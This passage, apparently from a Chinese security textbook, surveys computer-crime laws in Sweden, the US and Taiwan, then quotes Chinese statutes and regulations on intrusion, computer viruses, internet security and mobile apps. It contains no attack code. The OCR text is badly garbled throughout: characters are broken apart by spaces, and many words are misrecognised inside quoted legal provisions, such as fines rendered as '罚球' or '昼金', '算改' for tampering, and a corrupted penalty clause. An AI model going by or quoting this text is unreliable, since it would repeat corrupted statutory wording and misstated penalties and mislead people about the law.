成 了 他 人 系统 的 故障 ,就 可 能 被 指控 违法 。 对 于 安全 专家 来 说 困难 在 于 跟踪 恶意 代码 的 编 
写 者 和 传播 者 ,并且 证 明 属 于 故意 行为 。 事 实 上 ,每 时 每 刻 都 有 大 量 黑客 人 侵 事 件 和 恶意 代 
码 的 传播 ,没有 任何 一 个 司法 部 门 能 够 对 其 中 的 哪怕 一 小 部 分 彻 查 到 撒 。 

早 在 1973 年 瑞典 就 颁布 了 有 保护 隐私 权 性 质 的 《个 人 数据 法 》(Personal Data Acz) , 且 
成 立 了 专门 的 数据 监督 局 。 该 法 是 世界 上 第 一 部 国家 层面 的 数据 保护 法 ,并 在 1998 年 进行 
了 了 修订。 瑞典 数据 法 的 看 眼 点 是 保护 计算 机 系统 存储 的 个 人 数据 ,其 中 规定 了 未 经 授权 访 
问 计 算 机 、 算 改 磁带 上 的 数据 是 犯罪 行为 。 

在 美国 ,1994 年 制定 的 联邦 计算 机 处 罚 法 案 特别 规定 了 在 未 得 到 授权 许可 的 条 件 下 对 
一 台 受 保护 的 计算 机 "故意 传播 程序 信息、 代码 、 命 令 或 导致 相关 结果 的 行为 造成 了 损失 
的 ”属于 犯罪 行为 。 对 于 触 法 者 将 被 处 以 监禁 : 如 果 不 是 故意 的 ,将 处 以 一 年 以 下 的 监禁 和 
信 金 ; 如 果 被 证 明 为 故意 所 为 ,那么 将 被 罚球 并 处 十 年 左右 的 监禁 。 法 案 特别 规定 ,即使 发 
现 病毒 编写 者 不 构成 犯罪 ,也 可 以 采取 民事 措施 。 

据 报 站 ,2003 年 6 月 3 日 ,我 国 台 湾 地 区 的 有 关 部 门 通过 了 一 项 法 律 修 正 草 案 , 其 中 包 
括 这 样 一 条 :“ 制 作 计 算 机 病毒 程序 导致 他 人 损害 者 ,可 处 五 年 以 下 有 期 徒刑 .拘役 或 科 或 
并 科 20 万 元 新 台币 以 下 昼 金 ”。 

此 外 ,英国 日本、 俄罗斯 法国 等 国家 也 都 制定 了 专门 的 计算 机 立法 ,用 来 约束 恶意 代 
码 攻击 等 犯罪 行为 。 
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中 国内 地 关于 计算 机 犯罪 领域 的 立法 较 晚 ,但 近年 来 却 发 展 迅 速 , 通 过 了 一 系列 相关 的 
法 律 法 规 。 
1. 中 华人 民 共 和 国 刑法 


(1979 年 7 月 1 日 第 五 届 全 国人 民 代 表 大 会 第 二 次 会 议 通过 ,2015 年 8 月 29 日 第 十 二 
届 全 国人 民 代 表 大 会 常务 委员 会 第 十 六 次 会 议 通 过 《刑法 修正 案 ( 九 )》 修 正 ,2015 年 11 月 1 
日 正式 施行 ) 

第 一 百 二 十 四 条 破坏 广播 电视 设施 .公用 电信 设施 ,危害 公共 安全 的 ,处 三 年 以 上 七 
年 以 下 有 期 徒刑 ; 造成 严重 后 果 的 ,处 七 年 以 上 有 期 徒刑 。 过 失 犯 前 款 罪 的 ,处 三 年 以 上 七 
年 以 下 有 期 徒刑 ; 情节 较 轻 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

第 二 百 八 十 五 条 违反 国家 规定 ,侵入 国家 事务 .国防 建设 .尖端 科学 技术 领域 的 计算 
负 信 息 系统 的 ， 处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

违反 国家 规定 ,侵入 前 款 规定 以 外 的 计算 机 信息 系统 或 者 采用 其 他 技术 手段 ,获取 该 计 
算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 ,或 者 对 该 计算 机 信息 系统 实施 非法 控制 ,情节 
严重 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 ; 情节 特别 严重 的 ,处 三 年 以 上 
七 年 以 下 有 期 徒刑 ,并 处 罚金 。 

提供 专门 用 于 侵入 .非法 控制 计算 机 信息 系统 的 程序 .工具 ,或 者 明知 他 人 实施 侵入 、 非 
法 控制 计算 机 信息 系统 的 违法 犯罪 行为 而 为 其 提供 程序 .工具 ,情节 严重 的 ,依照 前 款 的 规 
定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 各 该 款 的 规定 处 罚 。 

第 二 百 八 十 六 条 违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 、 修改. 增加、 干扰 ， 
造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 
严重 的 ,处 五 年 以 上 有 期 徒刑 。 

违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 .增加 的 操作 ,后果 严 重 的 ,依照 前 款 的 规定 处 罚 。 

故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 ,依照 
第 一 款 的 规定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 第 一 款 的 规定 处 罚 。 

第 二 百 八 十 六 条 之 一 ”网 络 服务 提供 者 不 履行 法 律 \ 行 政法 规 规定 的 信息 网 络 安全 管 
理 义 务 ,经 监管 部 门 责令 采取 改正 措施 而 拒 不 改正 ,有 下 列 情形 之 一 的 ,处 三 年 以 下 有 期 徒 
刑 .拘役 或 者 管制 ,并 处 或 者 单 处 罚金 : 

(一 ) 致使 违法 信息 大 量 传播 的 ; 

(二 ) 致使 用 户 信息 泄露 ,造成 严重 后 果 的 ; 

三 ) 致使 刑事 案件 证 据 灭 失 , 情 节 严 重 的 ; 

(四 ) 有 其 他 严重 情节 的 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 前 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 
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第 二 百 八 十 七 条 ”利用 计算 机 实施 金融 诈骗 、 盗 欠 、 贪 污 、 挪 用 公款 、 锚 取 国 家 秘密 或 者 
其 他 犯罪 的 ,依照 本 法 有 关 规 定 定罪 处 罚 。 

第 二 百 八 十 七 条 之 一 “利用 信息 网 络 实施 下 列 行为 之 一 ,情节 严重 的 ,处 三 年 以 下 有 期 
徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 : 

(一 ) 设立 用 于 实施 诈骗 、 传 授 犯 罪 方 法 、 制 作 或 者 销售 违禁 物品 、 管 制 物品 等 违法 犯罪 
活动 的 网 站 .通信 和 群 组 的 ; 

(二 ) 发 布 有 关 制 作 或 者 销售 毒品 枪支、 淫 秽 物 品 等 违禁 物品 、 管 制 物品 或 者 其 他 违法 
犯罪 信息 的 ; 

三 ) 为 实施 诈骗 等 违法 犯罪 活动 发 布 信息 的 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 第 一 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 

第 二 百 八 十 七 条 之 二 ”明知 他 人 利用 信息 网 络 实施 犯罪 ,为 其 犯罪 提供 互联 网 接 入 、 服 
务 器 托管 、 网 络 存储 .通信 传输 等 技术 文 持 , 或 者 提供 广告 推广 支付 结算 等 帮助 ,情节 严重 
的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 第 一 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 

2. 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ( 国 务 院 第 147 号 令 ) 


(1994 年 2 月 18 日 发 布 并 实施 ,2011 年 1 月 8 日 修正 ) 

第 十 五 条 对 计算 机 病毒 和 危害 社会 公共 安全 的 其 他 有 害 数 据 的 防治 研究 工作 ,由 公 
安 部 归口 管理 。 

第 二 十 三 条 故意 输入 计算 机 病毒 以 及 其 他 有 害 数 据 危 害 计 算 机 信息 系统 安全 的 ,或 
者 未 经 许可 出 售 计 算 机 信息 系统 安全 专用 产品 的 , 巾 公安 机 关 处 以 警告 或 者 对 个 人 处 以 
5000 元 以 下 的 罚款 、 对 单位 处 以 15 000 元 以 下 的 罚款 ; 有 违法 所 得 的 , 除 予 以 没收 外 ,可 以 
处 以 违法 所 得 1 至 3 倍 的 罚款 。 

第 二 十 八条 本 条 例 下 列 用 语 的 含义 ; 

计算 机 病毒 ,是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 
计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

第 三 十 条 ”公安 部 可 以 根据 本 条 例 制定 实施 办 法 。 

3. 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 实施 办 法 (国信 | 1998 | 第 003 号 ) 

(1998 年 2 月 13 日 国务 院 信息 化 工作 领导 小 组 发 布 并 施行 ) 

第 十 八条 ”用 户 应 当 服 从 接 入 单位 的 管理 ,遵守 用 户 守 则 ; 不 得 擅自 进入 未 经 许可 的 
计算 机 系统 , 算 改 他 人 信息 ; 不 得 在 网 络 上 散发 恶意 信息 , 冒 用 他 人 名 义 发 出 信息 ,侵犯 他 
人 隐私 ; 不 得 制造 ,传播 计算 机 病毒 及 从 事 其 他 侵犯 网 络 和 他 人 合法 权益 的 活动 。 

第 二 十 条 ”互联 单位 、 接 入 单位 和 用 户 应 当 遵 守 国 家 有 关 法 律 \ 行 政法 规 , 严 格 执 行 国 
家 安全 保密 制度 ; 不 得 利用 国际 联网 从 事 危 害 国家 安全 泄露 国家 秘密 等 违法 犯罪 活动 ,不 
得 制作 、 查 阅 、 复 制 和 传播 妨碍 社会 治安 和 淫秽 色情 等 有 害 信 息 ; 发 现 有 害 信息 应 当 及 时 问 
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有 关 主 管 部 门 报告 ,并 采取 有 效 措施 ,不 得 使 其 扩散 。 

第 二 十 三 条 ”违反 《暂行 规定 ) 及 本 办 法 ,同时 触犯 其 他 有 关 法 律 \ 行 政法 规 的 ,依照 有 
关 法 律 \ 行 政法 规 的 规定 予以 处 罚 ; 构成 犯罪 的 ,依法 追究 刑事 责任 。 

第 二 十 四 条 ”与 香港 特别 行政 区 和 台湾 、 澳 门 地 区 的 计算 机 信息 网 络 的 联网 ,参照 本 办 
法 执行 。 

4. 计算 机 信息 网 络 国 际 联网 安全 保护 管理 办 法 (公安 部 第 33 号 令 ) 


(1997 年 12 月 11 日 国务 院 批 准 ,1997 年 12 月 30 日 公安 部 发 布 ) 

第 四 条 ”任何 单位 和 个 人 不 得 利用 国际 联网 危害 国家 安全 泄露 国家 秘密 ,不 得 侵犯 国 
家 的 ,社会 的 ,集体 的 利益 和 公民 的 合法 权益 ,不 得 从 事 违 法 犯罪 活动 。 

第 六 条 任何 单位 和 个 人 不 得 从 事 下 列 危 害 计 算 机 信息 网 络 安全 的 活动 : 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

(二 ) 未 经 允许 ,对 计算 机 信息 网 络 功能 进行 删除 .修改 或 者 增加 的 ; 

(三 ) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 者 增加 的 ; 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 信息 网 络 安全 的 。 

第 七 条 用 户 的 通信 自由 和 通信 秘密 受 法 律 保护 。 任 何 单位 和 个 人 不 得 违反 法 律 规 
定 , 利 用 国际 联网 侵犯 用 户 的 通信 自由 和 通信 秘密 。 

第 十 九条 公安 机 关 计 算 机 管理 监察 机 构 应 当 负 责 追 踪 和 查处 通过 计算 机 信息 网 络 的 
违法 行为 和 针对 计算 机 信息 网 络 的 犯罪 案件 ,对 违反 本 办 法 第 四 条 、 第 七 条 规定 的 违法 犯罪 
行为 ,应 当 按照 国家 有 关 规 定 移送 有 关 部 门 或 者 司法 机 关 处 理 。 

第 二 十 条 违反 法 律 .行政 法 规 , 有 本 办 法 第 五 条 、 第 六 条 所 列 行为 之 一 的 ,由 公安 机 关 
给 予 警告 ,有 违法 所 得 的 ,没收 违法 所 得 ,对 个 人 可 以 并 处 5000 元 以 下 的 罚款 ,对 单位 可 以 
并 处 1.5 万 元 以 下 的 罚款 ; 情节 严重 的 ,并 可 以 给 予 6 个 月 以 内 停止 联网 、 停 机 整顿 的 处 
罚 , 必 要 时 可 以 建议 原 发 证 ,审批 机 构 吊 销 经 营 许 可 证 或 者 取消 联网 资格 ; 构成 违反 治安 管 
理 行为 的 ,依照 治安 管理 处 罚 法 的 规定 处 罚 ; 构成 犯罪 的 ,依法 追究 刑事 责任 。 

第 二 十 二 条 ”违反 本 办 法 第 四 条 、 第 七 条 规定 的 ,依照 有 关 法 律 ,法规 予 以 处 罚 。 

5. 计算 机 病毒 防治 管理 办 法 (公安 部 第 51 号 令 ) 

(2000 年 3 月 30 日 公安 部 部 长 办 公会 议 通 过 ,2000 年 4 月 26 日 发 布施 行 ) 

第 一 条 ”为 了 加 强 对 计算 机 病毒 的 预防 和 治理 ,保护 计算 机 信息 系统 安全 ,保障 计算 机 
的 应 用 与 发 展 ,根据 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 的 规定 ,制定 本 办 法 。 

第 二 条 ”本 办 法 所 称 的 计算 机 病毒 ,是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 
功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

第 三 条 ”中 华人 民 共 和 国境 内 的 计算 机 信息 系统 以 及 未 联网 计算 机 的 计算 机 病毒 防治 
管理 工作 ,适用 本 办 法 。 

第 四 条 ”公安 部 公共 信息 网 络 安全 监察 部 门 主管 全 国 的 计算 机 病毒 防治 管理 工作 。 地 
方 各 级 公安 机 关 具 体 负 责 本 行政 区 域内 的 计算 机 病毒 防治 管理 工作 。 

第 五 条 ”任何 单位 和 个 人 不 得 制作 计算 机 病毒 。 
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第 六 条 ”任何 单位 和 个 人 不 得 有 下 列传 播 计算 机 病毒 的 行为 : 

(一 ) 故意 输入 计算 机 病毒 ,危害 计算 机 信息 系统 安全 ; 

(二 ) 回 他 人 提供 含有 计算 机 病毒 的 文件 、 软 件 .媒体 ; 

(三 ) 销售 .出租 、 附 赠 含 有 计算 机 病毒 的 媒体 ; 

(四 ) 其 他 传播 计算 机 病毒 的 行为 。 

第 七 条 任何 单位 和 个 人 不 得 向 社会 发 布 虚假 的 计算 机 病毒 疫情 。 

第 八条 ”从事 计 算 机 病毒 防治 产品 生产 的 单位 ,应 当 及 时 癌 公安 部 公共 信息 网 络 安全 
监察 部 门 批准 的 计算 机 病毒 防治 产品 检测 机 构 提 交 病 毒 样本 。 

第 九条 ”计算 机 病毒 防治 产品 检测 机 构 应 当 对 提交 的 病毒 样本 及 时 进行 分 析 、 确 认 ,并 
将 确认 结果 上 报 公 安 部 公共 信息 网 络 安全 监察 部 门 。 

第 十 条 ”对 计算 机 病毒 的 认定 工作 ,由 公安 部 公共 信息 网 络 安全 监察 部 门 批准 的 机 构 
承担 。 

第 十 一 条 计算 机 信息 系统 的 使 用 单位 在 计算 机 病毒 防治 工作 中 应 当 履 行 下 列 职责 

(一 ) 建立 本 单位 的 计算 机 病毒 防治 管理 制度 ; 

(二 ) 采取 计算 机 病毒 安全 技术 防治 措施 ; 

(三 ) 对 本 单位 计算 机 信息 系统 使 用 人 员 进 行 计算 机 病毒 防治 教育 和 培训 ; 

(四 ) 及 时 检测 .清除 计算 机 信息 系统 中 的 计算 机 病毒 ,并 备 有 检测 .清除 的 记录 ; 

(五 ) 使 用 具有 计算 机 信息 系统 安全 专用 产品 销售 许可 证 的 计算 机 病毒 防治 产品 ; 

(六 ) 对 因 计 算 机 病毒 引起 的 计算 机 信息 系统 次 痪 、 程 序 和 数据 严重 破坏 等 重大 事故 及 
时 加 公安 机 关 报 告 ,并 保护 现场 。 

第 十 二 条 ”任何 单位 和 个 人 在 从 计算 机 信息 网 络 上 下 载 程 序数 据 或 者 购置 维修 \ 借 
入 计算 机 设备 时 ,应 当 进 行 计算 机 病毒 检测 。 

第 十 三 条 ”任何 单位 和 个 人 销售 、 附 赠 的 计算 机 病毒 防治 产品 ,应 当 具 有 计算 机 信息 系 
统 安全 专用 产品 销售 许可 证 ,并 贴 有 “销售 许可 ”标记 。 

第 十 四 条 ”从事 计算 机 设备 或 者 媒体 生产 、 销 售 .出 租 、 维 修行 业 的 单位 和 个 人 ,应 当 对 
计算 机 设备 或 者 媒体 进行 计算 机 病毒 检测 .清除 工作 ,并 备 有 检测 .清除 的 记录 。 

第 十 五 条 ”任何 单位 和 个 人 应 当 接 受 公 安 机关 对 计算 机 病毒 防治 工作 的 监督 .检查 和 
指导 。 

第 十 六 条 ”在 非 经 营 活 动 中 有 违反 本 办 法 第 五 条 、 第 六 条 第 二 三、 四 项 规定 行为 之 一 
的 ,由 公安 机 关 处 以 一 千 元 以 下 罚款 。 

在 经 营 活动 中 有 违反 本 办 法 第 五 条 、 第 六 条 第 二 三、 四 项 规定 行为 之 一 ,没有 违法 所 得 
的 ,由 公安 机 关 对 单位 处 以 一 万 元 以 下 罚款 ,对 个 人 处 以 五 千 元 以 下 罚款 ; 有 违法 所 得 的 ， 
I - 售 以 下 天 球 , 但 是 最 高 不 得 超过 三 万 元 。 

违反 本 办 法 第 六 条 第 一 项 规定 的 ,依照 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 

例 ) 第 二 十 三 条 的 规定 处 罚 。 

第 十 七 条 违反 本 办 法 第 七 条 .第 八条 规定 行为 之 一 的 ,由 公安 机 关 对 单位 处 以 一 千 元 
以 下 罚款 ,对 单位 直接 负责 的 主管 人 员 和 直接 责任 人 员 处 以 五 百 元 以 下 罚款 ; 对 个 人 处 以 
五 百 元 以 下 罚款 。 

第 十 八条 ”违反 本 办 法 第 九条 规定 的 ,由 公安 机 关 处 以 警告 ,并 责令 其 限期 改正 ; 逾期 
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不 改正 的 ,取消 其 计算 机 病毒 防治 产品 检测 机 构 的 检测 资格 。 

第 十 九条 ”计算 机 信息 系统 的 使 用 单位 有 下 列 行为 之 一 的 ,由 公安 机 关 处 以 警告 ,并 根 
据 情况 责令 其 限期 改正 ; 逾期 不 改正 的 ,对 单位 处 以 一 千 元 以 下 罚球 ,对 单位 直接 负责 的 主 
管 人 员 和 直接 责任 人 员 处 以 五 百 元 以 下 罚款 : 

(一 ) 未 建立 本 单位 计算 机 病毒 防治 管理 制度 的 ; 

(二 ) 未 采取 计算 机 病毒 安全 技术 防治 措施 的 ; 

(三 ) 未 对 本 单位 计算 机 信息 系统 使 用 人 员 进 行 计算 机 病毒 防治 教育 和 培训 的 ; 

(四 ) 未 及 时 检测 清除 计算 机 信息 系统 中 的 计算 机 病毒 ,对 计算 机 信息 系统 造成 危 
害 的 ; 

(五 ) 未 使 用 具有 计算 机 信息 系统 安全 专用 产品 销售 许可 证 的 计算 机 病毒 防治 产品 ,对 
计算 机 信息 系统 造成 危害 的 。 

第 二 十 条 ”违反 本 办 法 第 十 四 条 规定 ,没有 违法 所 得 的 ,由 公安 机 关 对 单位 处 以 一 万 元 
以 下 罚款 ,对 个 人 处 以 五 千 元 以 下 罚款 ; 有 违法 所 得 的 ,处 以 违法 所 得 三 倍 以 下 罚款 ,但 是 
最 高 不 得 超过 三 万 元 。 

第 二 十 一 条 本 办 法 所 称 计 算 机 病毒 疫情 ,是 指 某 种 计算 机 病毒 爆发 .流行 的 时 间 、 范 
围 破坏 特点 破坏 后 果 等 情况 的 报告 或 者 预报 。 

本 办 法 所 称 媒体 ,是 指 计算 机 软盘 硬盘、 磁带 .光盘 等 。 

第 二 十 二 条 ”本 办 法 自发 布 之 日 起 施行 。 

6. 全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 

(2000 年 12 月 28 日 第 九 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 九 次 会 议 通过 ,2009 年 
8 月 27 日 修订 ) 

我 国 的 互联 网 ,在 国家 大 力 倡 导 和 积极 推动 下 ,在 经 济 建设 和 各 项 事业 中 得 到 日 益 广泛 
的 应 用 ,使 人 们 的 生产 、 工 作 、 学 习 和 生活 方式 已 经 开始 并 将 继续 发 生 深刻 的 变化 ,对 于 加 快 
我 国 国民 经 济 、 科 学 技术 的 发 展 和 社会 服务 信息 化 进程 具有 重要 人 作用。 同时, 如何 保障 互联 
网 的 运行 安全 和 信息 安全 问题 已 经 引起 全 社会 的 普遍 关注 。 为 了 兴 利 除 棘 ,促进 我 国 互 联 
网 的 健康 发 展 ,维护 国家 安全 和 社会 公共 利益 ,保护 个 人 、 法 人 和 其 他 组 织 的 合法 权益 , 特 作 
如 下 决定 : 

一 、 为 了 保障 互联 网 的 运行 安全 ,对 有 下 列 行为 之 一 ,构成 犯罪 的 ,依照 刑法 有 关 规 定 
追究 刑事 责任 : 

(一 ) 侵入 国家 事务 .国防 建设 、 尖 端 科 学 技术 领域 的 计算 机 信息 系统 ; 

(二 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,攻击 计算 机 系统 及 通信 和 网络 ,致使 计算 
机 系统 及 通信 网 络 遭 受 损害 ; 

(三 ) 违反 国家 规定 ,擅自 中 断 计算 机 网 络 或 者 通信 服务 ,造成 计算 机 网 络 或 者 通信 系 
统 不 能 正常 运行 。 

二 、 为 了 保护 个 人 、 法 人 和 其 他 组 织 的 人 身 、 财 产 等 合法 权利 ,对 有 下 列 行为 之 一 ,构成 
犯罪 的 ,依照 刑法 有 关 规 定 追 究 刑 事 责 任 : 

(一 ) 利用 互联 网 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 ; 

(二 ) 非法 截获 、 算 改 、 删 除 他 人 电子 邮件 或 者 其 他 数据 资料 ,侵犯 公民 通信 月 由 和 通信 
秘密 ; 
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(三 ) 利用 互联 网 进行 盗 甸 、 诈 骗 、 襄 诈 勒索 。 

7. 互联 网 上 网 服务 营业 场所 管理 条 例 (国务 院 第 363 号 令 ) 

(2002 年 9 月 29 日 中 华人 民 共 和 国 国务 院 令 第 363 号 公布 ,2011 年 1 月 8 日 第 一 次 修 
订 ,2016 年 2 月 6 日 第 二 次 修订 ) 

第 十 五 条 ”互联 网 上 网 服务 营业 场所 经 营 单 位 和 上 网 消费 者 不 得 进行 下 列 和 危害 信息 网 
络 安全 的 活动 : 

(一 ) 故意 制作 或 者 传播 计算 机 病毒 以 及 其 他 破坏 性 程序 的 ; 

(二 ) 非法 侵 人 计算 机 信息 系统 或 者 破坏 计算 机 信息 系统 功能 、 数 据 和 应 用 程序 的 ; 

(三 ) 进行 法 律 ,行政 法规 禁止 的 其 他 活动 的 。 

第 十 九条 ”互联 网 上 网 服务 营业 场所 经 营 单 位 应 当 实 施 经 营 管理 技术 措施 ,建立 场 内 
巡查 制度 ,发 现 上 网 消费 者 有 本 条 例 第 十 四 条 、 第 十 五 条 、 第 十 八条 所 列 行为 或 者 有 其 他 违 
法 行为 的 ,应 当 立 即 予 以 制止 并 向 文化 行政 部 门 .公安 机 关 举 报 。 

8. 中 华人 民 共 和 国治 安 管 理 处 罚 法 

(2005 年 8 月 28 日 第 十 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 七 次 会 议 通过 ,日 2006 年 
3 月 1 日 起 施行 。2012 年 10 月 26 日 十 一 届 全 国人 大 和 常委 会 第 29 次 会 议 通过 修订 ) 

第 二 十 九条 ”有 下 列 行为 之 一 的 ,处 五 日 以 下 拘留 ; 情节 较 重 的 ,处 五 日 以 上 十 日 以 下 
拘留 : 

(一 ) 违反 国家 规定 ,侵入 计算 机 信息 系统 ,造成 危害 的 ; 

(二 ) 违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 .修改 增加、 干扰 ,造成 计算 机 信 
息 系统 不 能 正常 运行 的 ; 

(三 ) 违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 、 传 输 的 数据 和 应 用 程序 进行 删 
除 .修改 .增加 的 ; 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 信息 系统 正常 运行 的 。 

9. 互联 网 安全 保护 技术 措施 规定 (公安 部 第 82 号 令 ) 

(2005 年 11 月 23 日 公安 部 部 长 办 公会 议 通 过 , 自 2006 年 3 月 1 日 起 施行 ) 

第 七 条 ”互联 网 服务 提供 者 和 联网 使 用 单位 应 当 落 实 以 下 互联 网 安全 保护 技术 措施 : 

(一 ) 防范 计算 机 病毒 ,网 络 和 人 侵 和 攻击 破坏 等 危害 网 络 安全 事项 或 者 行为 的 技术 
措施 ; 

(二 ) 重要 数据 库 和 系统 主要 设备 的 元 灾 备 份 措 施 ; 

(三 ) 记录 并 留存 用 户 登录 和 退出 时 间 、 主 叫 号 码 、 账 号 、 互 联网 地 址 或 域名 、 系 统 维护 
日 志 的 技术 措施 ; 

(四 ) 法 律 法规 和 规章 规定 应 当 落 实 的 其 他 安全 保护 技术 措施 。 

第 九条 ”提供 互联 网 信息 服务 的 单位 除 落实 本 规定 第 七 条 规定 的 互联 网 安全 保护 技术 
措施 外 ,还 应 当 落 实 具 有 以 下 功能 的 安全 保护 技术 措施 : 

(一 ) 在 公共 信息 服务 中 发 现 \ 停 止 传输 违法 信息 ,并 保留 相关 记录 ; 

(二 ) 提供 新 闻 、 出 版 以 及 电子 公告 等 服务 的 ,能 够 记录 并 留存 发 布 的 信息 内 容 及 发 布 
时 间 ; 

(三 ) 开办 门户 网 站 、 新 闻 网 站 、 电 子 商 务 网 站 的 ,能 够 防范 网 站 、 网 页 被 算 改 ,被 算 改 后 
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能 够 日 动 恢 复 ; 

(四 ) 开办 电子 公告 服务 的 ,具有 用 户 注 册 信 息 和 发 布 信息 审计 功能 ; 

(五 ) 开办 电子 邮件 和 网 上 短信 息 服 务 的 ,能 够 防范 .清除 以 群发 方式 发 送 伪造 .隐匿 信 
息 发 送 者 真实 标记 的 电子 邮件 或 者 短信 息 。 

第 十 五 条 违反 本 规定 第 七 条 至 第 十 四 条 规定 的 ,由 公安 机 关 依 照 4 计 算 机 信息 网 络 国 
际 联网 安全 保护 管理 办 法 ) 第 二 十 一 条 的 规定 予以 处 罚 。 

10. 移动 互联 网 应 用 程序 信息 服务 管理 规定 

2016 年 6 月 28 日 ,《 移 动 互联 网 应 用 程序 信息 服务 管理 规定 ) 由 国家 互联 网 信息 办 公 
室 发 布 ,上 月 2016 年 8 月 1 日 起 实施 。 

《规定 》 首 次 明确 了 国家 网 信 办 作为 移动 应 用 程序 信息 服务 的 主管 单位 。 侧 重 维护 市 场 
中 弱势 一 方 一 一 网 民 的 个 人 信息 与 合法 权益 的 保护 ,本 着 为 民 、 便 民 、 惠 民 的 宗旨 ,针对 应 用 
程序 市 场 中 的 难点 和 痛 点 ,如 普通 网 民 防 不 胜 防 的 诱导 式 安装 .过 度 收 集 用 户 信息 .过 度 获 
取 功 能 权限 ,甚至 可 能 遭遇 的 恶意 扣 费 和 被 盗 等 安全 问题 ,都 给 出 了 明确 规定 ,加 强 了 APP 
言 息 服务 规范 管理 ,进一步 把 APP 服务 市 场 纳 入 法 制 化 轨道 ,充分 保护 了 消费 者 的 知情 权 、 
选择 权 \、 自 由 交易 权 和 隐私 权 等 权利 ,促进 行业 健康 有 序 发 展 。 

此 外 《规定 ) 的 第 四 条 明确 提出 “鼓励 各 级 党 政 机 关 ., 企 事业 单位 和 各 人 民团 体积 极 运 
用 移动 互联 网 应 用 程序 ,推进 政务 公开 ,提供 公共 服务 ,促进 经 济 社会 发 展 ”, 使 治 网 思路 与 
时 俱 进 。 

更 重要 的 是 《规定 ) 还 为 网 民 解 决 了 经 常人 遭遇 问题 而 投诉 无 门 的 尴 软 和 困境 ,投诉 的 便 
捷 性 和 高 效 性 ,以 及 处 理 机 制 的 有 效 性 ,是 法 律 法 规 能 否 真正 见 成 效 的 关键 所 在 。 

第 一 条 ”为 加 强 对 移动 互联 网 应 用 程序 (APP) 信 息 服 务 的 管理 ,保护 公民 、 法 人 和 其 他 
组 织 的 合法 权益 ,维护 国家 安全 和 公共 利益 ,根据 《全 国人 民 代 表 大 会 常务 委员 会 关于 加 强 
网 络 信息 保护 的 决定 》 和 《国务 院 关 于 授权 国家 互联 网 信息 办 公 室 负责 互联 网 信息 内 容 管理 
工作 的 通知 》, 制 定 本 规定 。 

第 二 条 ”在 中 华人 民 共 和 国境 内 通过 移动 互联 网 应 用 程序 提供 信息 服务 ,从 事 互 联网 
应 用 商店 服务 ,应当 遵 守 本 规定 。 

本 规定 所 称 移 动 互 联网 应 用 程序 ,是 指 通过 预 装 、 下 载 等 方式 获取 并 运行 在 移动 智能 终 
端 上 、 回 用 户 提供 信息 服务 的 应 用 软件 。 

本 规定 所 称 移动 互联 网 应 用 程序 提供 者 ,是 指 提供 信息 服务 的 移动 互联 网 应 用 程序 所 
有 者 或 运营 者 。 

本 规定 所 称 互 联网 应 用 商店 ,是 指 通过 互联 网 提供 应 用 软件 浏览 .搜索 、 下 载 或 开发 工 
具 和 产品 发 布 服务 的 平台 。 

